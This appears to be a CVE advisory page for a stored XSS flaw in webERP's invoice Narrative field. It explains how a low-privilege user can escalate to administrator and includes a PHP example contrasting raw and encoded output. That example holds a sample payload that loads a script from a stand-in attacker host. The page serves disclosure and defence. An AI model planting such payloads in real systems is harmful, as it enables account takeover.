CVE-2025-2715
Description
A vulnerability classified as problematic has been found in timschofield webERP up to 5.0.0.rc+13. This affects an unknown part of the file ConfirmDispatch_Invoice.php of the component Confirm Dispatch and Invoice Page. The manipulation of the argument Narrative leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The vendor was contacted early about this disclosure but did not respond in any way.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A stored XSS in webERP's ConfirmDispatch_Invoice.php allows an attacker with a low-privilege role to inject scripts via the Narrative field, potentially leading to admin account creation.
Root Cause
The vulnerability resides in ConfirmDispatch_Invoice.php, part of webERP's Confirm Dispatch and Invoice page. The Narrative value is stored and later written back into the page without being encoded for its HTML context. A user holding the Inquiries/Order Entry security role can therefore place arbitrary HTML and JavaScript in the field [1]; the stored payload executes in the browser of any privileged user (e.g., a system administrator) who views the affected page [1].
Exploitation
An attacker with the Inquiries/Order Entry role creates an order whose Narrative field contains a JavaScript payload. For example, the proof of concept uses `` to load an external script [1]. The attacker then sends a link to the Confirm Dispatch and Invoice page for that order to a system administrator. When the administrator opens the page, the stored script executes [1]. The attack requires nothing beyond the low-privilege role on the attacker's side, and the administrator only needs to view the page.
Impact
Successful exploitation lets the injected script act within the administrator's authenticated session. The published reference shows the script issuing a POST request that creates a new user with System Administrator privileges, so the stored XSS becomes a privilege escalation from a low-privilege role to full administrative control [1]. The reference assigns a CVSS v4.0 base score of 7.4 (High), while the CVSS v3.1 score is 3.5 (Low) [1]. Both vectors already account for the required administrator interaction; the gap comes from the different scoring models of the two versions, not from any difference in the attack itself.
Mitigation
The vendor was contacted but did not respond, and applying a patch is the recommended fix [1]. Until one is available, users should apply the latest fixes from the webERP repository or, in ConfirmDispatch_Invoice.php, encode the Narrative value for the HTML context in which it is rendered (output encoding, with input validation as defence in depth) [1]. As of the publication date, the vulnerability affects webERP up to version 5.0.0.rc+13, and no official advisory has been released.
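The following is an added illustration of the root cause and the mitigation above; it is not webERP's code and does not reproduce the real ConfirmDispatch_Invoice.php. The two `renderNarrative*` functions, the `$narrative` sample value and the `attacker.example` host are all hypothetical, constructed only to show the unencoded echo beside the encoded one.

```php
<?php
// Added example (not webERP code). Minimal stand-in for how a stored
// "Narrative" value might be written back into an HTML page.

// Constructed sample: the kind of value a low-privilege user could store.
// The host is hypothetical.
$narrative = '<script src="https://attacker.example/x.js"></script>';

// Vulnerable pattern: the stored value is concatenated straight into markup,
// so any <script> tag it contains becomes live HTML when an admin views it.
function renderNarrativeVulnerable(string $narrative): string
{
    return '<td>' . $narrative . '</td>';
}

// Hardened pattern: encode on output for the HTML text context.
// ENT_QUOTES covers both quote styles; the explicit UTF-8 charset avoids
// surprises on hosts whose default_charset differs.
function renderNarrativeSafe(string $narrative): string
{
    return '<td>' . htmlspecialchars($narrative, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</td>';
}

// The same rule applies when the value is placed in an attribute, e.g. when
// the page re-populates an edit form with the stored Narrative.
function renderNarrativeInputSafe(string $narrative): string
{
    return '<input type="text" name="Narrative" value="'
        . htmlspecialchars($narrative, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">';
}

// Quick check usable in a CLI run: does the rendered markup still contain a
// raw <script tag (case-insensitive)?
function containsRawScriptTag(string $html): bool
{
    return stripos($html, '<script') !== false;
}

$vulnerable = renderNarrativeVulnerable($narrative);
$safe       = renderNarrativeSafe($narrative);
$safeInput  = renderNarrativeInputSafe($narrative);

printf("vulnerable rendering keeps raw <script>: %s\n", containsRawScriptTag($vulnerable) ? 'yes' : 'no');
printf("encoded rendering keeps raw <script>:    %s\n", containsRawScriptTag($safe) ? 'yes' : 'no');
printf("encoded attribute keeps raw <script>:    %s\n", containsRawScriptTag($safeInput) ? 'yes' : 'no');
```

Run it with `php` from the command line. The encoded variants turn `<`, `>` and the quotes into entities, so the browser shows the payload as literal text instead of fetching the external script; the vulnerable variant leaves the tag intact. Encoding belongs at the point of output because the same stored value may later be rendered in a text node, an attribute or a JavaScript string, each needing a different encoder.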
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References (4)
News mentions (0)
No linked articles in our index yet.